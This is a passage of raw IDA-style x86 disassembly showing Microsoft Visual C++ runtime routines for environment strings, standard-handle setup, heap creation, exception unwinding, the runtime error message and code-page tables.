loc_4031B3: ; CODE XREF: sub_403145+73�j
; sub_403145+7A�j
inc eax
inc eax
cmp [eax], bx
jnz short loc_4031B3
inc eax
inc eax
cmp [eax], bx
jnz short loc_4031B3
loc_4031C1: ; CODE XREF: sub_403145+6C�j
sub eax, esi
mov edi, dword_4050B0
sar eax, 1
push ebx
push ebx
inc eax
push ebx
push ebx
push eax
push esi
push ebx
push ebx
mov [esp+38h+var_4], eax
call edi ; dword_4050B0
mov ebp, eax
cmp ebp, ebx
jz short loc_403212
push ebp
call sub_403D56
cmp eax, ebx
pop ecx
mov [esp+18h+var_8], eax
jz short loc_403212
push ebx
push ebx
push ebp
push eax
push [esp+28h+var_4]
push esi
push ebx
push ebx
call edi ; dword_4050B0
test eax, eax
jnz short loc_40320E
push [esp+18h+var_8]
call sub_403D27
pop ecx
mov [esp+18h+var_8], ebx
loc_40320E: ; CODE XREF: sub_403145+B9�j
mov ebx, [esp+18h+var_8]
loc_403212: ; CODE XREF: sub_403145+99�j
; sub_403145+A8�j
push esi
call dword_4050B4 ; FreeEnvironmentStringsW
mov eax, ebx
jmp short loc_403270
; ---------------------------------------------------------------------------
loc_40321D: ; CODE XREF: sub_403145+51�j
cmp eax, 2
jnz short loc_40326E
loc_403222: ; CODE XREF: sub_403145+49�j
cmp edi, ebx
jnz short loc_403232
call dword_4050AC ; GetEnvironmentStringsA
mov edi, eax
cmp edi, ebx
jz short loc_40326E
loc_403232: ; CODE XREF: sub_403145+DF�j
cmp [edi], bl
mov eax, edi
jz short loc_403242
loc_403238: ; CODE XREF: sub_403145+F6�j
; sub_403145+FB�j
inc eax
cmp [eax], bl
jnz short loc_403238
inc eax
cmp [eax], bl
jnz short loc_403238
loc_403242: ; CODE XREF: sub_403145+F1�j
sub eax, edi
inc eax
mov ebp, eax
push ebp
call sub_403D56
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_403258
xor esi, esi
jmp short loc_403263
; ---------------------------------------------------------------------------
loc_403258: ; CODE XREF: sub_403145+10D�j
push ebp
push edi
push esi
call sub_402330
add esp, 0Ch
loc_403263: ; CODE XREF: sub_403145+111�j
push edi
call dword_4050D8 ; FreeEnvironmentStringsA
mov eax, esi
jmp short loc_403270
; ---------------------------------------------------------------------------
loc_40326E: ; CODE XREF: sub_403145+39�j
; sub_403145+61�j ...
xor eax, eax
loc_403270: ; CODE XREF: sub_403145+D6�j
; sub_403145+127�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_403145 endp
; =============== S U B R O U T I N E =======================================
sub_403277 proc near ; CODE XREF: .text:0040294D�p
var_44 = byte ptr -44h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
sub esp, 44h
push ebx
push ebp
push esi
push edi
push 100h
call sub_403D56
mov esi, eax
pop ecx
test esi, esi
jnz short loc_403297
push 1Bh
call sub_4029D4
pop ecx
loc_403297: ; CODE XREF: sub_403277+16�j
mov dword_407360, esi
mov dword_407460, 20h
lea eax, [esi+100h]
loc_4032AD: ; CODE XREF: sub_403277+52�j
cmp esi, eax
jnb short loc_4032CB
and byte ptr [esi+4], 0
or dword ptr [esi], 0FFFFFFFFh
mov byte ptr [esi+5], 0Ah
mov eax, dword_407360
add esi, 8
add eax, 100h
jmp short loc_4032AD
; ---------------------------------------------------------------------------
loc_4032CB: ; CODE XREF: sub_403277+38�j
lea eax, [esp+54h+var_44]
push eax
call dword_4050BC ; GetStartupInfoA
cmp word ptr [esp+54h+var_14+2], 0
jz loc_4033A7
mov eax, [esp+54h+var_10]
test eax, eax
jz loc_4033A7
mov esi, [eax]
lea ebp, [eax+4]
mov eax, 800h
cmp esi, eax
lea ebx, [esi+ebp]
jl short loc_403301
mov esi, eax
loc_403301: ; CODE XREF: sub_403277+86�j
cmp dword_407460, esi
jge short loc_40335B
mov edi, offset dword_407364
loc_40330E: ; CODE XREF: sub_403277+DA�j
push 100h
call sub_403D56
test eax, eax
pop ecx
jz short loc_403355
add dword_407460, 20h
mov [edi], eax
lea ecx, [eax+100h]
loc_40332C: ; CODE XREF: sub_403277+CF�j
cmp eax, ecx
jnb short loc_403348
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
mov ecx, [edi]
add eax, 8
add ecx, 100h
jmp short loc_40332C
; ---------------------------------------------------------------------------
loc_403348: ; CODE XREF: sub_403277+B7�j
add edi, 4
cmp dword_407460, esi
jl short loc_40330E
jmp short loc_40335B
; ---------------------------------------------------------------------------
loc_403355: ; CODE XREF: sub_403277+A4�j
mov esi, dword_407460
loc_40335B: ; CODE XREF: sub_403277+90�j
; sub_403277+DC�j
xor edi, edi
test esi, esi
jle short loc_4033A7
loc_403361: ; CODE XREF: sub_403277+12E�j
mov eax, [ebx]
cmp eax, 0FFFFFFFFh
jz short loc_40339E
mov cl, [ebp+0]
test cl, 1
jz short loc_40339E
test cl, 8
jnz short loc_403380
push eax
call dword_405094 ; GetFileType
test eax, eax
jz short loc_40339E
loc_403380: ; CODE XREF: sub_403277+FC�j
mov eax, edi
mov ecx, edi
sar eax, 5
and ecx, 1Fh
mov eax, dword_407360[eax*4]
lea eax, [eax+ecx*8]
mov ecx, [ebx]
mov [eax], ecx
mov cl, [ebp+0]
mov [eax+4], cl
loc_40339E: ; CODE XREF: sub_403277+EF�j
; sub_403277+F7�j ...
inc edi
inc ebp
add ebx, 4
cmp edi, esi
jl short loc_403361
loc_4033A7: ; CODE XREF: sub_403277+65�j
; sub_403277+71�j ...
xor ebx, ebx
loc_4033A9: ; CODE XREF: sub_403277+195�j
mov eax, dword_407360
cmp dword ptr [eax+ebx*8], 0FFFFFFFFh
lea esi, [eax+ebx*8]
jnz short loc_403404
test ebx, ebx
mov byte ptr [esi+4], 81h
jnz short loc_4033C4
push 0FFFFFFF6h
pop eax
jmp short loc_4033CE
; ---------------------------------------------------------------------------
loc_4033C4: ; CODE XREF: sub_403277+146�j
mov eax, ebx
dec eax
neg eax
sbb eax, eax
add eax, 0FFFFFFF5h
loc_4033CE: ; CODE XREF: sub_403277+14B�j
push eax
call dword_4050A0 ; GetStdHandle
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_4033F3
push edi
call dword_405094 ; GetFileType
test eax, eax
jz short loc_4033F3
and eax, 0FFh
mov [esi], edi
cmp eax, 2
jnz short loc_4033F9
loc_4033F3: ; CODE XREF: sub_403277+163�j
; sub_403277+16E�j
or byte ptr [esi+4], 40h
jmp short loc_403408
; ---------------------------------------------------------------------------
loc_4033F9: ; CODE XREF: sub_403277+17A�j
cmp eax, 3
jnz short loc_403408
or byte ptr [esi+4], 8
jmp short loc_403408
; ---------------------------------------------------------------------------
loc_403404: ; CODE XREF: sub_403277+13E�j
or byte ptr [esi+4], 80h
loc_403408: ; CODE XREF: sub_403277+180�j
; sub_403277+185�j ...
inc ebx
cmp ebx, 3
jl short loc_4033A9
push dword_407460
call dword_4050A4 ; SetHandleCount
pop edi
pop esi
pop ebp
pop ebx
add esp, 44h
retn
sub_403277 endp
; =============== S U B R O U T I N E =======================================
sub_403422 proc near ; CODE XREF: .text:00402938�p
arg_0 = dword ptr 4
xor eax, eax
push 0
cmp [esp+4+arg_0], eax
push 1000h
setz al
push eax
call dword_40508C ; HeapCreate
test eax, eax
mov dword_407348, eax
jz short loc_403457
call sub_403DCA
test eax, eax
jnz short loc_40345A
push dword_407348
call dword_405090 ; HeapDestroy
loc_403457: ; CODE XREF: sub_403422+1E�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40345A: ; CODE XREF: sub_403422+27�j
push 1
pop eax
retn
sub_403422 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403460 proc near ; CODE XREF: sub_403558+5A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_403478
push [ebp+arg_0]
call sub_404D58 ; RtlUnwind
loc_403478: ; DATA XREF: sub_403460+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_403460 endp
; =============== S U B R O U T I N E =======================================
sub_403480 proc near ; DATA XREF: sub_4034A2+A�o
; .text:00403513�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_4034A1
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_4034A1: ; CODE XREF: sub_403480+10�j
retn
sub_403480 endp
; =============== S U B R O U T I N E =======================================
sub_4034A2 proc near ; CODE XREF: sub_403558+67�p
; sub_403558+A7�p ...
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_403480
push large dword ptr fs:0
mov large fs:0, esp
loc_4034BF: ; CODE XREF: sub_4034A2:loc_4034FA�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_4034FC
cmp esi, [esp+1Ch+arg_4]
jz short loc_4034FC
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_4034FA
push 101h
mov eax, [ebx+esi*4+8]
call sub_403536
call dword ptr [ebx+esi*4+8]
loc_4034FA: ; CODE XREF: sub_4034A2+44�j
jmp short loc_4034BF
; ---------------------------------------------------------------------------
loc_4034FC: ; CODE XREF: sub_4034A2+2A�j
; sub_4034A2+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_4034A2 endp
; ---------------------------------------------------------------------------
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset sub_403480
jnz short locret_40352C
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_40352C
mov eax, 1
locret_40352C: ; CODE XREF: .text:0040351A�j
; .text:00403525�j
retn
; ---------------------------------------------------------------------------
push ebx
push ecx
mov ebx, offset dword_406D9C
jmp short loc_403540
; =============== S U B R O U T I N E =======================================
sub_403536 proc near ; CODE XREF: sub_4034A2+4F�p
; sub_403558+78�p
push ebx
push ecx
mov ebx, offset dword_406D9C
mov ecx, [ebp+8]
loc_403540: ; CODE XREF: .text:00403534�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
pop ecx
pop ebx
retn 4
sub_403536 endp
; ---------------------------------------------------------------------------
align 10h
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403558 proc near ; DATA XREF: .text:004028E8�o
; sub_4037BC+A�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
cld
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
test dword ptr [eax+4], 6
jnz loc_4035F8
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_40358B: ; CODE XREF: sub_403558+90�j
cmp esi, 0FFFFFFFFh
jz short loc_4035F1
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_4035DF
push esi
push ebp
lea ebp, [ebx+10h]
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_4035DF
js short loc_4035EA
mov edi, [ebx+8]
push ebx
call sub_403460
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_4034A2
add esp, 8
lea ecx, [esi+esi*2]
push 1
mov eax, [edi+ecx*4+8]
call sub_403536
mov eax, [edi+ecx*4]
mov [ebx+0Ch], eax
call dword ptr [edi+ecx*4+8]
loc_4035DF: ; CODE XREF: sub_403558+40�j
; sub_403558+52�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp short loc_40358B
; ---------------------------------------------------------------------------
loc_4035EA: ; CODE XREF: sub_403558+54�j
mov eax, 0
jmp short loc_40360D
; ---------------------------------------------------------------------------
loc_4035F1: ; CODE XREF: sub_403558+36�j
mov eax, 1
jmp short loc_40360D
; ---------------------------------------------------------------------------
loc_4035F8: ; CODE XREF: sub_403558+18�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_4034A2
add esp, 8
pop ebp
mov eax, 1
loc_40360D: ; CODE XREF: sub_403558+97�j
; sub_403558+9E�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_403558 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call sub_4034A2
add esp, 8
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
sub_403630 proc near ; CODE XREF: sub_4029D4+9�p
; sub_4029F9+9�p
mov eax, dword_406F58
cmp eax, 1
jz short loc_403647
test eax, eax
jnz short locret_403668
cmp dword_406AE4, 1
jnz short locret_403668
loc_403647: ; CODE XREF: sub_403630+8�j
push 0FCh
call sub_403669
mov eax, dword_4070B4
pop ecx
test eax, eax
jz short loc_40365D
call eax ; dword_4070B4
loc_40365D: ; CODE XREF: sub_403630+29�j
push 0FFh
call sub_403669
pop ecx
locret_403668: ; CODE XREF: sub_403630+C�j
; sub_403630+15�j
retn
sub_403630 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403669 proc near ; CODE XREF: sub_4029D4+12�p
; sub_4029F9+12�p ...
var_1A4 = byte ptr -1A4h
var_A0 = byte ptr -0A0h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1A4h
mov edx, [ebp+arg_0]
xor ecx, ecx
mov eax, offset dword_406DB0
loc_40367C: ; CODE XREF: sub_403669+20�j
cmp edx, [eax]
jz short loc_40368B
add eax, 8
inc ecx
cmp eax, offset byte_406E40
jl short loc_40367C
loc_40368B: ; CODE XREF: sub_403669+15�j
push esi
mov esi, ecx
shl esi, 3
cmp edx, dword_406DB0[esi]
jnz loc_4037B9
mov eax, dword_406F58
cmp eax, 1
jz loc_403793
test eax, eax
jnz short loc_4036BC
cmp dword_406AE4, 1
jz loc_403793
loc_4036BC: ; CODE XREF: sub_403669+44�j
cmp edx, 0FCh
jz loc_4037B9
lea eax, [ebp+var_1A4]
push 104h
push eax
push 0
call dword_405034 ; GetModuleFileNameA
test eax, eax
jnz short loc_4036F3
lea eax, [ebp+var_1A4]
push offset aProgramNameUnk ; "<program name unknown>"
push eax
call sub_4027C0
pop ecx
pop ecx
loc_4036F3: ; CODE XREF: sub_403669+75�j
lea eax, [ebp+var_1A4]
push edi
push eax
lea edi, [ebp+var_1A4]
call sub_4022B0
inc eax
pop ecx
cmp eax, 3Ch
jbe short loc_403736
lea eax, [ebp+var_1A4]
push eax
call sub_4022B0
mov edi, eax
lea eax, [ebp+var_1A4]
sub eax, 3Bh
push 3
add edi, eax
push offset a___ ; "..."
push edi
call sub_4046A0
add esp, 10h
loc_403736: ; CODE XREF: sub_403669+A2�j
lea eax, [ebp+var_A0]
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
push eax
call sub_4027C0
lea eax, [ebp+var_A0]
push edi
push eax
call sub_4027D0
lea eax, [ebp+var_A0]
push offset asc_405400 ; "\n\n"
push eax
call sub_4027D0
push off_406DB4[esi]
lea eax, [ebp+var_A0]
push eax
call sub_4027D0
push 12010h
lea eax, [ebp+var_A0]
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push eax
call sub_404613
add esp, 2Ch
pop edi
jmp short loc_4037B9
; ---------------------------------------------------------------------------
loc_403793: ; CODE XREF: sub_403669+3C�j
; sub_403669+4D�j
lea eax, [ebp+arg_0]
lea esi, off_406DB4[esi]
push 0
push eax
push dword ptr [esi]
call sub_4022B0
pop ecx
push eax
push dword ptr [esi]
push 0FFFFFFF4h
call dword_4050A0 ; GetStdHandle
push eax
call dword_40507C ; WriteFile
loc_4037B9: ; CODE XREF: sub_403669+2E�j
; sub_403669+59�j ...
pop esi
leave
retn
sub_403669 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4037BC proc near ; CODE XREF: sub_402AEC+5E�p
; sub_403B86+9A�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_405440
push offset sub_403558
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 18h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, dword_4070B8
xor ebx, ebx
cmp eax, ebx
jnz short loc_40382B
lea eax, [ebp+var_1C]
push eax
push 1
pop esi
push esi
push offset dword_40543C
push esi
call dword_405070 ; GetStringTypeW
test eax, eax
jz short loc_403809
mov eax, esi
jmp short loc_403826
; ---------------------------------------------------------------------------
loc_403809: ; CODE XREF: sub_4037BC+47�j
lea eax, [ebp+var_1C]
push eax
push esi
push offset dword_406F48
push esi
push ebx
call dword_405074 ; GetStringTypeA
test eax, eax
jz loc_4038F1
push 2
pop eax
loc_403826: ; CODE XREF: sub_4037BC+4B�j
mov dword_4070B8, eax
loc_40382B: ; CODE XREF: sub_4037BC+2F�j
cmp eax, 2
jnz short loc_403854
mov eax, [ebp+arg_14]
cmp eax, ebx
jnz short loc_40383C
mov eax, dword_4070D4
loc_40383C: ; CODE XREF: sub_4037BC+79�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
call dword_405074 ; GetStringTypeA
jmp loc_4038F3
; ---------------------------------------------------------------------------
loc_403854: ; CODE XREF: sub_4037BC+72�j
cmp eax, 1
jnz loc_4038F1
cmp [ebp+arg_10], ebx
jnz short loc_40386A
mov eax, dword_4070E4
mov [ebp+arg_10], eax
loc_40386A: ; CODE XREF: sub_4037BC+A4�j
push ebx
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
mov eax, [ebp+arg_18]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_10]
call dword_405078 ; MultiByteToWideChar
mov [ebp+var_20], eax
cmp eax, ebx
jz short loc_4038F1
mov [ebp+var_4], ebx
lea edi, [eax+eax]
mov eax, edi
add eax, 3
and al, 0FCh
call sub_402670
mov [ebp+var_18], esp
mov esi, esp
mov [ebp+var_24], esi
push edi
push ebx
push esi
call sub_402250
add esp, 0Ch
jmp short loc_4038C0
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor esi, esi
loc_4038C0: ; CODE XREF: sub_4037BC+F7�j
or [ebp+var_4], 0FFFFFFFFh
cmp esi, ebx
jz short loc_4038F1
push [ebp+var_20]
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push 1
push [ebp+arg_10]
call dword_405078 ; MultiByteToWideChar
cmp eax, ebx
jz short loc_4038F1
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_0]
call dword_405070 ; GetStringTypeW
jmp short loc_4038F3
; ---------------------------------------------------------------------------
loc_4038F1: ; CODE XREF: sub_4037BC+61�j
; sub_4037BC+9B�j ...
xor eax, eax
loc_4038F3: ; CODE XREF: sub_4037BC+93�j
; sub_4037BC+133�j
lea esp, [ebp-34h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_4037BC endp
; =============== S U B R O U T I N E =======================================
sub_403905 proc near ; CODE XREF: sub_402DE7+2B�p
arg_0 = dword ptr 4
push 4
push 0
push [esp+8+arg_0]
call sub_403916
add esp, 0Ch
retn
sub_403905 endp
; =============== S U B R O U T I N E =======================================
sub_403916 proc near ; CODE XREF: sub_403905+8�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
movzx eax, [esp+arg_0]
mov cl, [esp+arg_8]
test byte_407241[eax], cl
jnz short loc_403943
cmp [esp+arg_4], 0
jz short loc_40393C
movzx eax, word_406AFA[eax*2]
and eax, [esp+arg_4]
jmp short loc_40393E
; ---------------------------------------------------------------------------
loc_40393C: ; CODE XREF: sub_403916+16�j
xor eax, eax
loc_40393E: ; CODE XREF: sub_403916+24�j
test eax, eax
jnz short loc_403943
retn
; ---------------------------------------------------------------------------
loc_403943: ; CODE XREF: sub_403916+F�j
; sub_403916+2A�j
push 1
pop eax
retn
sub_403916 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403947 proc near ; CODE XREF: sub_403D0B+B�p
var_18 = dword ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
push [ebp+arg_0]
call sub_403AE0 ; GetOEMCP
mov esi, eax
pop ecx
cmp esi, dword_407110
mov [ebp+arg_0], esi
jz loc_403AD4
xor ebx, ebx
cmp esi, ebx
jz loc_403ACA
xor edx, edx
mov eax, offset dword_406E48
loc_40397B: ; CODE XREF: sub_403947+41�j
cmp [eax], esi
jz short loc_4039F1
add eax, 30h
inc edx
cmp eax, offset dword_406F38
jl short loc_40397B
lea eax, [ebp+var_18]
push eax
push esi
call dword_40506C ; GetCPInfo
cmp eax, 1
jnz loc_403AC2
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_407240
cmp [ebp+var_18], 1
mov dword_407110, esi
rep stosd
stosb
mov dword_407344, ebx
jbe loc_403AB0
cmp [ebp+var_12], 0
jz loc_403A86
lea ecx, [ebp+var_11]
loc_4039CE: ; CODE XREF: sub_403947+139�j
mov dl, [ecx]
test dl, dl
jz loc_403A86
movzx eax, byte ptr [ecx-1]
movzx edx, dl
loc_4039DF: ; CODE XREF: sub_403947+A8�j
cmp eax, edx
ja loc_403A7A
or byte_407241[eax], 4
inc eax
jmp short loc_4039DF
; ---------------------------------------------------------------------------
loc_4039F1: ; CODE XREF: sub_403947+36�j
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_407240
rep stosd
lea esi, [edx+edx*2]
mov [ebp+var_4], ebx
shl esi, 4
stosb
lea ebx, dword_406E58[esi]
loc_403A0D: ; CODE XREF: sub_403947+103�j
cmp byte ptr [ebx], 0
mov ecx, ebx
jz short loc_403A40
loc_403A14: ; CODE XREF: sub_403947+F7�j
mov dl, [ecx+1]
test dl, dl
jz short loc_403A40
movzx eax, byte ptr [ecx]
movzx edi, dl
cmp eax, edi
ja short loc_403A39
mov edx, [ebp+var_4]
mov dl, byte_406E40[edx]
loc_403A2E: ; CODE XREF: sub_403947+F0�j
or byte_407241[eax], dl
inc eax
cmp eax, edi
jbe short loc_403A2E
loc_403A39: ; CODE XREF: sub_403947+DC�j
inc ecx
inc ecx
cmp byte ptr [ecx], 0
jnz short loc_403A14
loc_403A40: ; CODE XREF: sub_403947+CB�j
; sub_403947+D2�j
inc [ebp+var_4]
add ebx, 8
cmp [ebp+var_4], 4
jb short loc_403A0D
mov eax, [ebp+arg_0]
mov dword_40712C, 1
push eax
mov dword_407110, eax
call sub_403B2A
lea esi, dword_406E4C[esi]
mov edi, offset dword_407120
movsd
movsd
pop ecx
mov dword_407344, eax
movsd
jmp short loc_403ACF
; ---------------------------------------------------------------------------
loc_403A7A: ; CODE XREF: sub_403947+9A�j
inc ecx
inc ecx
cmp byte ptr [ecx-1], 0
jnz loc_4039CE
loc_403A86: ; CODE XREF: sub_403947+7E�j
; sub_403947+8B�j
push 1
pop eax
loc_403A89: ; CODE XREF: sub_403947+14F�j
or byte_407241[eax], 8
inc eax
cmp eax, 0FFh
jb short loc_403A89
push esi
call sub_403B2A
pop ecx
mov dword_407344, eax
mov dword_40712C, 1
jmp short loc_403AB6
; ---------------------------------------------------------------------------
loc_403AB0: ; CODE XREF: sub_403947+74�j
mov dword_40712C, ebx
loc_403AB6: ; CODE XREF: sub_403947+167�j
xor eax, eax
mov edi, offset dword_407120
stosd
stosd
stosd
jmp short loc_403ACF
; ---------------------------------------------------------------------------
loc_403AC2: ; CODE XREF: sub_403947+51�j
cmp dword_4070BC, ebx
jz short loc_403AD8
loc_403ACA: ; CODE XREF: sub_403947+27�j
call sub_403B5D
loc_403ACF: ; CODE XREF: sub_403947+131�j
; sub_403947+179�j
call sub_403B86
loc_403AD4: ; CODE XREF: sub_403947+1D�j
xor eax, eax
jmp short loc_403ADB
; ---------------------------------------------------------------------------
loc_403AD8: ; CODE XREF: sub_403947+181�j
or eax, 0FFFFFFFFh
loc_403ADB: ; CODE XREF: sub_403947+18F�j
pop edi
pop esi
pop ebx
leave
retn
sub_403947 endp
; =============== S U B R O U T I N E =======================================
sub_403AE0 proc near ; CODE XREF: sub_403947+C�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
and dword_4070BC, 0
cmp eax, 0FFFFFFFEh
jnz short loc_403B00
mov dword_4070BC, 1
jmp dword_405064
; ---------------------------------------------------------------------------
loc_403B00: ; CODE XREF: sub_403AE0+E�j
cmp eax, 0FFFFFFFDh
jnz short loc_403B15
mov dword_4070BC, 1
jmp dword_405068
; ---------------------------------------------------------------------------
loc_403B15: ; CODE XREF: sub_403AE0+23�j
cmp eax, 0FFFFFFFCh
jnz short locret_403B29
mov eax, dword_4070E4
mov dword_4070BC, 1
locret_403B29: ; CODE XREF: sub_403AE0+38�j
retn
sub_403AE0 endp
; =============== S U B R O U T I N E =======================================
sub_403B2A proc near ; CODE XREF: sub_403947+118�p
; sub_403947+152�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
sub eax, 3A4h
jz short loc_403B57
sub eax, 4
jz short loc_403B51
sub eax, 0Dh
jz short loc_403B4B
dec eax
jz short loc_403B45
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_403B45: ; CODE XREF: sub_403B2A+16�j
mov eax, 404h
retn
; ---------------------------------------------------------------------------
loc_403B4B: ; CODE XREF: sub_403B2A+13�j
mov eax, 412h
retn
; ---------------------------------------------------------------------------
loc_403B51: ; CODE XREF: sub_403B2A+E�j
mov eax, 804h
retn
; ---------------------------------------------------------------------------
loc_403B57: ; CODE XREF: sub_403B2A+9�j
mov eax, 411h
retn
sub_403B2A endp
; =============== S U B R O U T I N E =======================================
sub_403B5D proc near ; CODE XREF: sub_403947:loc_403ACA�p
push edi
push 40h
pop ecx
xor eax, eax
mov edi, offset byte_407240
rep stosd
stosb
xor eax, eax
mov edi, offset dword_407120
mov dword_407110, eax
mov dword_40712C, eax
mov dword_407344, eax
stosd
stosd
stosd
pop edi
retn
sub_403B5D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403B86 proc near ; CODE XREF: sub_403947:loc_403ACF�p
var_514 = byte ptr -514h
var_314 = byte ptr -314h
var_214 = byte ptr -214h
var_114 = byte ptr -114h
var_14 = byte ptr -14h
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
push ebp
mov ebp, esp
sub esp, 514h
lea eax, [ebp+var_14]
push esi
push eax
push dword_407110
call dword_40506C ; GetCPInfo
cmp eax, 1
jnz loc_403CBF
xor eax, eax
mov esi, 100h
loc_403BB0: ; CODE XREF: sub_403B86+34�j
mov [ebp+eax+var_114], al
inc eax
cmp eax, esi
jb short loc_403BB0
mov al, [ebp+var_E]
mov [ebp+var_114], 20h
test al, al
jz short loc_403C01
push ebx
push edi
lea edx, [ebp+var_D]
loc_403BCF: ; CODE XREF: sub_403B86+77�j
movzx ecx, byte ptr [edx]
movzx eax, al
cmp eax, ecx
ja short loc_403BF6
sub ecx, eax
lea edi, [ebp+eax+var_114]
inc ecx
mov eax, 20202020h
mov ebx, ecx
shr ecx, 2
rep stosd
mov ecx, ebx
and ecx, 3
rep stosb
loc_403BF6: ; CODE XREF: sub_403B86+51�j
inc edx
inc edx
mov al, [edx-1]
test al, al
jnz short loc_403BCF
pop edi
pop ebx
loc_403C01: ; CODE XREF: sub_403B86+42�j
push 0
lea eax, [ebp+var_514]
push dword_407344
push dword_407110
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 1
call sub_4037BC
push 0
lea eax, [ebp+var_214]
push dword_407110
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push esi
push dword_407344
call sub_40479E
push 0
lea eax, [ebp+var_314]
push dword_407110
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 200h
push dword_407344
call sub_40479E
add esp, 5Ch
xor eax, eax
lea ecx, [ebp+var_514]
loc_403C7C: ; CODE XREF: sub_403B86+135�j
mov dx, [ecx]
test dl, 1
jz short loc_403C9A
or byte_407241[eax], 10h
mov dl, [ebp+eax+var_214]
loc_403C92: ; CODE XREF: sub_403B86+127�j
mov byte_407140[eax], dl
jmp short loc_403CB6
; ---------------------------------------------------------------------------
loc_403C9A: ; CODE XREF: sub_403B86+FC�j
test dl, 2
jz short loc_403CAF
or byte_407241[eax], 20h
mov dl, [ebp+eax+var_314]
jmp short loc_403C92
; ---------------------------------------------------------------------------
